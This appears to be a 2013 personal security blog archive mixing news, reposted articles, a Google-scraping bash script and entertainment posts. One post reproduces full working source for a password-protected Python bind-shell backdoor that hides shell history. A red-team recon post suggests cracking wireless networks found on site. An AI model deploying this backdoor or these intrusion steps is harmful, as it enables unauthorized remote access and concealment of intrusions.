8/10/2013 Inactivity
8/04/2013 Quick Python Backdoor
#!/usr/bin/env python ##################### #-----------------------------------------------+ # ._____________________. | # Coded by slav0nic | slav0nic0@gmail.com | | # ^---------------------^ | # Site: slav0nic.xss.ru | #-----------------------------------------------+ #version 1.2.1 # #Use: python wh_bindshell.py [port] [password] | python wh_bindshell.py - for use # default_settings #for make password: # python -c"import md5; print md5.new('you_password').hexdigest()" # #bugz: ctrl+c etc =script stoped=\ (after reconnect it work) from socket import * import os import sys import md5 import popen2 #############_Default_##################### Port=50001 #_default port Pass ='427003594444ed93c9fe9b0b420264e4' #_default password ='slav0nic' simvol='$ ' #_prompt autocommands="unset HISTFILE;uname -a;id" #autostart=) kill_bsh='kbsh' #command for kill bindshell ########################################## if len(sys.argv)>1: Port=int(sys.argv[1]) print '[+]Port=',sys.argv[1] if len(sys.argv)>2: Pass=str(md5.new(sys.argv[2]).hexdigest()) print '[+]New_pass' try: sockobj=socket(AF_INET,SOCK_STREAM) sockobj.bind(('',Port)) sockobj.listen(5) except: print '[-]SocketError',sys.exc_value sys.exit(1) if os.fork()==0: #for start bindshell as proc and exit while 1: connection,address=sockobj.accept() data=connection.recv(1024) getpass=md5.new(data[:-2]) bsh_pid=os.getpid() if getpass.hexdigest()==Pass: if os.fork()==0: info=os.popen(autocommands).read() connection.send(info) while 1: data=connection.recv(1024) if not data:break if data[:-2]==kill_bsh: os.popen('kill '+str(bsh_pid)) sys.exit(0) cmd_res,stdin,stderror=popen2.popen3(data[:-2]) result= cmd_res.read() error=stderror.read() if error: connection.send(error) for i in range(len(data.split())-1): if 'cd' in data.split()[i]: try: os.chdir(data.split()[i+1].split(';')[0]) except: error='[-]Error '+str(sys.exc_value)+'\n' connection.send(error) ###Prompt username=os.popen("whoami").read() adr=os.popen("uname -n").read() if username[:-1]=='root': simvol='# ' path=os.getcwd() promt='['+username[:-1]+'@'+adr[:-1]+' '+path+']'+simvol ### answer=result+promt connection.send(answer) else: connection.close() sys.exit(0)
8/01/2013 How an Android device can becomes a spyphone
7/30/2013 Analisis Clickjacking
clickjacking, where hidden actions are executed when you click on a button or link in plain sight.
Enlace url sin unshorten. |
Acortador utilizado para malware spreading |
7/19/2013 Identity theft[Video]
Identity theft is a form of stealing someone's identity in which someone pretends to be someone else by assuming that person's identity, typically in order to access resources or obtain credit and other benefits in that person's name. The victim of identity theft (here meaning the person whose identity has been assumed by the identity thief) can suffer adverse consequences if they are held accountable for the perpetrator's actions. Identity theft occurs when someone uses another's personally identifying information, like their name, identifying number, or credit card number, without their permission, to commit fraud or other crimes.
The term identity theft was coined in 1964[1] however it is not literally possible to steal an identity—less ambiguous terms are identity fraud or impersonation.
7/12/2013 Digital Carjackers Show Off New Attacks
7/05/2013 THE CYPHERNOMICON
THE CYPHERNOMICON: Cypherpunks FAQ and More, Version 0.666, 1994-09-10, Copyright Timothy C. May. All rights reserved. See the detailed disclaimer. Use short sections under "fair use" provisions, with appropriate credit, but don't put your name on my words. 1994-09-10, Copyright Timothy C. May. All rights reserved. See the detailed disclaimer. Use short sections under "fair use" provisions, with appropriate credit, but don't put your name on my words.http://www.spinnaker.com/crypt/cyphernomicon/CP-FAQ
7/03/2013 Introducing sources.debian.net
code of Debian packages on the web with syntax highlighting,search through the source code ,with the possibility of adding contextual pop-up messages . It is updated and contains source code for all suites in the Debian archive. It currently uses around 381 GB of disk space for uncompressed source packages and around 83 GB for the source package mirror. It is integrated into codesearch.d.n and the PTS. It was created by Stefano Zacchiroli and the web front-end was written by Matthieu Caneill.
sources.d.n
follows closely the Debian archive in two ways:- it is updated 4 times a day to reflect the content of the Debian archive
- it contains sources coming from official Debian suites: the usual ones (from oldstable to experimental),
*-updates
(ex volatile),*-proposed-updates
, and*-backports
(from Wheezy on)
Ensayando sources.debian.net en Osiris |
[1] http://bits.debian.org/2013/
3/03/2013 DARPA on Cyber Targeted-Attack Analyzer program & micro-satellites
DARPA on Cyber Targeted-Attack Analyzer program & micro-satellites
Protect the country, population and assets from cyber threats, this is a must for every government, a challenge for every state, new processes, large investment and innovative researches are the topics most debated in this period. Yesterday I wrote about the Russian government and its commitment to strengthen cyber defense, today I desire to introduce how US are trying to improve their cyber capabilities to face with cyber threats. Surely one of the most interesting and prolific agency in this sense is the US DARPA (Defense Advanced Research Projects Agency) responsible for the development of new technologies for use by the military, so I decide to introduce some of its actual and future works that could impact security in cyberspace. Few days ago the agency announced the development of a program to design a defense system able to uncover and prevent targeted cyber attacks based on the computer network managed directly from Department of Defense. The network is considered one of the largest structure in the world and is used to provide a connection infrastructure to personnel across the globe, through the net the employees of DoD collect, transfer and process any kind of information referring a multitude of sources using various device. The network is also used for military operative purposes, its nodes include in-the-field mobile devices and mission computers on board F-18's, it is fundamental to understand the dynamicity of the structure due the continuous technological improvement and the huge and growing quantity of information managed. This characteristic make very difficult its protection against cyber attacks, perimeter defense could be inappropriate, that why DARPA researchers are trying to define a new defensive model. The announcement made on DARPA web site states:
"[DARPA] seek a new approach, one that relies on knowing the cyber terrain within the network and understanding how information across the enterprise is connected to find actions associated with an attack buried under within all the normal data."
The project appears ambitious and hard to realize, the new Cyber Targeted-Attack Analyzer program will attempt to automatically monitor the entire network, every node and correlate the data flow from different sources despite the technological mutation of the network, its grows and shifts. The principal deliverables of the project are:
- Automatically indexing data sources on a network without human intervention;
- Integration of all data structures through a common language for security-related data, and;
- Development tools to allow reasoning over the federated database
The principal problem is identify in a timely manner the information flows with the intent to be able to discriminate any faults in it, in a successive phase of program the agency seeks to build tools that use this information for cyber defense of the network. DARPA program manager Richard Guidorizzi declared:
"The Cyber Targeted-Attack Analyzer program relies on a new approach to security, seeking to quickly understand the interconnections of the systems within a network without a human having to direct it," "Cyber defenders should then be capable of more quickly discovering attacks hidden in normal activities."
Networks aren't the only concern of DARPA that is looking with great attention to UAV and satellites technologies considered pillars of military operations. DARPA is specializing its researches on micro-satellites used for spying purpose and to support militias in case of battlefield. UAV technology is also used for this task but has the great limit that the aircraft need to be re-fueled, on the other side orbiting satellites have operational windows limited by their overflight schedule. DARPA is evaluating the creation of a hybrid solution to support troops in real time, Tom Bussing, vice president of Advanced Missile Systems at Raytheon Missile Systems declared.
"We're putting near-real time data where the warfighter needs it – directly into their hands – and providing them with vital, tactical intelligence they can control,"
Raytheon is often present in DARPA projects, let's remind CHAMP project developed by Air Force Research Laboratory that explores the possibility to design a directed-energy weapon capable of destroying and interfering with adversary's electronic systems such as radar systems, telecommunication systems, computer systems and power distribution systems. While the project is started in military and is led by Boeing the technology comes from a small company called Ktech, acquired by Raytheon bought last year, specialized in the providing of microwave generators to generate EMP able to knock out electronics equipment. Last December, DARPA awarded Raytheon a $1.5 million contract for first Phase of the Space Enabled Effects for Military Engagements (SeeMe) project that will build a constellations of micro-satellites to provide troops with accurate satellite imaging within 90 minutes. DARPA program manager Dave Barnhart added:
"SeeMe is a logical adjunct to UAV technology, which will continue to provide local or regional very high-resolution coverage, but which can't cover extended areas without frequent refueling,"
The satellites will have reduced dimensions, about 3 feet long, a foot in diameter, weigh around 25 pounds, and carry a $500,000 price tag.
Both projects are in the embryonic phase but DARPA agency consider them strategic to support future military operations and are the demonstration of the effort that governments are spending to improve their cyber capabilities in an era where technology is the most important factor for both defense and offense.
Pierluigi Paganini
References
http://securityaffairs.co/wordpress/11926/security/darpa-on-cyber-targeted-attack-analyzer-program-micro-satellites.html
Copyright 2010 Respective Author at Infosec IslandOriginal Page: https://www.infosecisland.com/blogview/22874-DARPA-on-Cyber-Targeted-Attack-Analyzer-program-amp-micro-satellites.html
Enviado desde mi iPod
2/21/2013 Recon sometimes is just walking and observing. If you know what...
Recon sometimes is just walking and observing. If you know what...
Recon sometimes is just walking and observing. If you know what to look for you can notice things that are in the wrong place. Vulnerable spots and ways in.
Another good thing to have is a small laptop an iPad. Run a stumbler or signal scanner, stash the laptop or iPad on your pack and just walk. If you find one, mark the spot and return. Try to capture packets and see if you can crack that wireless or bluetooth.
Have a little notebook - I prefer Field Notes - and sketch a quick map of the area and take notes of what you see. Jot down atmospherics: people's behavior, cars, cameras, points of interest, etc.
Do this a few times and if the atmospherics remain the same you know you have the place down and you can start planning.
Remember: On a day-to-day basis, security is mostly about paying attention.
Original Page: http://redteams.net/post/41343604120
2/19/2013 Infosec Reactions
When I hear someone say 0day in the street!
2/12/2013 Humility....
The first test of a truly great man is his humility. By humility I don't mean doubt of his powers or hesitation in speaking his opinion, but merely an understanding of the relationship of what he can say and what he can do.
John Ruskin
2/09/2013 TPB AFK: The Pirate Bay Away From Keyboard
Dear internets!
As much as I am celebrating the upcoming release of the film, it is a time of mixed emotions for me. When I started filming this project in 2008 I had no idea the launch of the film would sync with my main characters’ prison sentences. They gave me access to their private lives but won’t be able to share the premiere with me.Anakata is currently serving his prison sentence and Peter and Fredrik are wanted. The trial against TPB is proof that the issue around copyright has not been solved. I hope their story will re-spark the conversation around civil rights in the digital age – beyond the so called Content industries. Let’s work together to find fair solutions to both keep the internet open while protecting everyone’s rights in the digital age.Please join us for the world premiere on Friday 8th and share the film as much as you can! Meanwhile, I’ll be on Reddit doing on AMA on Thursday February 7th at 20:00CET/14:00 EST to answer any questions about the film.More soon,Simon.
Debian bugs #800000 and #1000000 contest
As the bug #700000 mark was turned on February 7th 2013, Debian
developers and contributors need yet another new challenge.
So, for the fourth time, a small contest has been set up. It
is very simple: please place a bet (one per person) about the day bugs
#800000 and #1000000 will be reported.
The winner(s) will be the person(s) placing her|his|their bet as close
as possible to the real moment bug #800000 and #1000000 are reported.
There is nothing to win but the pride of being the person who
predicted our bug report rate for the next months|years, just what
René Mayorga won twice for bugs #500000 and #600000 and an obscure
french DD won for bug #700000.
The bet page is a wiki page: http://wiki.debian.org/800000thBugContest
It will be closed on April 30th 2013 (if I remember doing so!). Bets
will be kept statically until bug #800000 is reported.
Please note that bets for bug #1000000 placed back in 2008 and 2010
are kept on this page. Do not modify that section but record your bet
in "Bets for bug #1000000, placed after bug #700000, in 2013".
2/06/2013 Moving Inside from Red Teams's blog
Moving inside
http://redteams.net/post/42025232223/moving-inside
Have you Watched This Chapter ?
history about a software genius and a Ex-Cia operative work together to prevent crimes before they can happen the creator of this is Jonathan Nolan.
Who hasn't notice this ,surveillance everywhere governments sometimes use this systems to fight against terrorist and also civilians like in the movie Enemy of the state...In the last chapter of Person we could watch and evidence real things like ghost companies,many people know this but nobody wants to say it,cyberweapons....all in this chapter so check it out :DThe Machine
The Machine is a computer network that monitors surveillance cameras, electronic communications, and audio input. From this data, the Machine is able to accurately predict violent acts. Currently under control of the U.S. Government, its stated job is to foresee terrorist attacks and modify intelligence reports to include this 'relevant' data, allowing the government to forestall terrorist activity. However, the Machine can detect all future violent acts, not just terrorism. At some point in the development of the Machine, Finch created a routine that would pass on the so-called irrelevant numbers to him, via coded messages over a public telephone. Unbeknown to Finch, Ingram also created a routine called "Contingency" on the eve of the government handoff. It is as yet unknown what this program does, or if it is currently active. [1]
Pd:Sorry i couldn't find it in english only. :P
[1] https://en.wikipedia.org/wiki/Person_of_Interest_(TV_series)
2/04/2013 Hacker Wars 1.1
Hacker Wars 1.1 from dklinedinst on Vimeo.
There are tree teams Alpha(spies),Beta(Hacktivists),Delta....check the video and see what happend :D
2/02/2013 Google Search with bash
yesterday i was just curious about lynx and google search engine,so we can use bash for get quick results an automate the process,also i want to filter the url,using sed or awk .
the first thing is stablish the url for a proper search for this example i wanna to use this
http://www.google.com/search?q=keywordforsearchhere&start=pagenumberherewhere the search?q= interpret the proper keyword. and &start= is the number of page,as a text browser i use lynx followed of -dump and -listonly options,lynx provide many command line options but for this test i just use the above -dump for formatted output of the default document and -listonly that show only the list of links.
for the first test i use keyword=house and page=1
lynx "http://www.google.com/search?q=house&start=1" -dump -listonly
it gives a result like in the pastie
http://pastie.org/private/jlaakeglj0fsfga27tmoqgthe final result :
lynx "http://www.google.com/search?q=house&start=1" -dump -listonly | grep 'url?q=' | cut -d ' ' -f4 | sed 's/http:\/\/www.google.com\/url?q=//' | sed 's/\(&sa=\).*//'finally :
#!/bin/bash #Google search using bash tools #we need $1 the keyword count=0 #page number while [ "$count" -le 200 ] do lynx "http://www.google.com/search?q=$1&start=$count" -dump -listonly | grep 'url?q=' | cut -d ' ' -f4 | sed 's/http:\/\/www.google.com\/url?q=//' | sed 's/\(&sa=\).*//' count=$(( $count +5 )) done echoCiao
2/01/2013 China vs USA
Cyberwarfare is growing up fastly,all goverments are entering to the game but what happend with Colombia,supposedly there is a CERT... https://twitter.com/colCERTNew York Times hit by cyber attack: The New York Times reportedlate Wednesday that it had been the victim of a cyber attack for the last four months while working on a story about Chinese prime minister Wen Jiabao and his business connections.According to the report, hackers based in China have been targeting the newspaper’s computer systems and and working to get passwords associated with the publication’s reporters and other employees. The Times shared information on the attacks with the FBI and eventually tracked the source of the attacks. No consumer data was taken from the site, the report said.Twitter has a brief outage: Twitter confirmed that some users were unable to access the service Thursday, marking the second time this month that the micro-blogging service has been hit with an outage.The company said on its status blog that it was working to resolve the issue. Compuware’s Outage Analyzer tool indicated that users across North America and Europe may have been affected by the problem, but it’s not clear how many of the site’s estimated 200 million active users were unable to reach the service.The service was also temporarily unavailable on Inauguration Day, Jan. 21.Showrooming shoppers don’t always buy online: Brick-and-mortar retailers may be seeing early success with efforts to combat “showrooming” — the habit of shoppers who look at products in stores but then buy those products online at a lower price.Data released Thursday by the Pew Internet and American Life Project showed that nearly half of those who consulted their mobile phones for online prices, 46 percent, ended up in line at the cash register — an 11-point increase from 2011.Just 12 percent of those surveyed left stores to buy the products online, said Pew research associate Aaron Smith. He said that the survey didn’t delve into the shoppers’ motivations but that he thinks new retailer efforts, such as online price-matching, may have contributed to rise in in-store purchasing.
Docs:
https://www.dnp.gov.co/LinkClick.aspx?fileticket=-lf5n8mSOuM%3D&tabid=1260
http://programa.gobiernoenlinea.gov.co/apc-aa-files/5854534aee4eee4102f0bd5ca294791f/DisenodeunCSIRTColombiano.pdf
Where can i report a vulnerability?
Is ColCert an acronym(just kidding)?
What does it stand for ?
Is most than a twitter account ?
Is there any plan for take this out there ?...
1/16/2013 ThinkPad Torture Test ?
I like thinkpad series...
1/08/2013 Tron Uprising
Beck is a young program who becomes the skillful leader of a revolution inside the computer world of The Grid. His mission is to free his home and friends from the reign of the villainous Clu and his henchman General Tesler. Beck will be trained by Tron – the greatest warrior the Grid has ever known. Tron will not only teach Beck the fighting and light cycle skills he needs to challenge this brutal military occupation, but he will be a guide and mentor to him as he grows beyond his youthful, impulsive nature into a courageous, powerful, strong leader. Destined to become the next Tron of the system, Beck adopts Tron's persona and becomes the archenemy of General Tesler and his oppressive forces.
1/02/2013 Radare Project .Under Ios
"The radare project started in February of 2006 aiming to provide a Free and simple command line interface for an hexadecimal editor supporting 64 bit offsets to make searches and recovering data from hard-disks.
Since then, the project has grown with the aim changed to provide a complete framework for analyzing binaries with some basic *NIX concepts in mind like 'everything is a file', 'small programs that interact together using stdin/out' or 'keep it simple'.The project is composed by an hexadecimal editor as the central point of the project with assembler/disassembler, code analysis, scripting features, analysis and graphs of code and data, easy unix integration"recently i found out that radare is right now for ios,since i knew it i just went to my ipod and started the install the first step to do this is add the new source in cydia :
Adding the source in cydia. radare.org/cydia/ |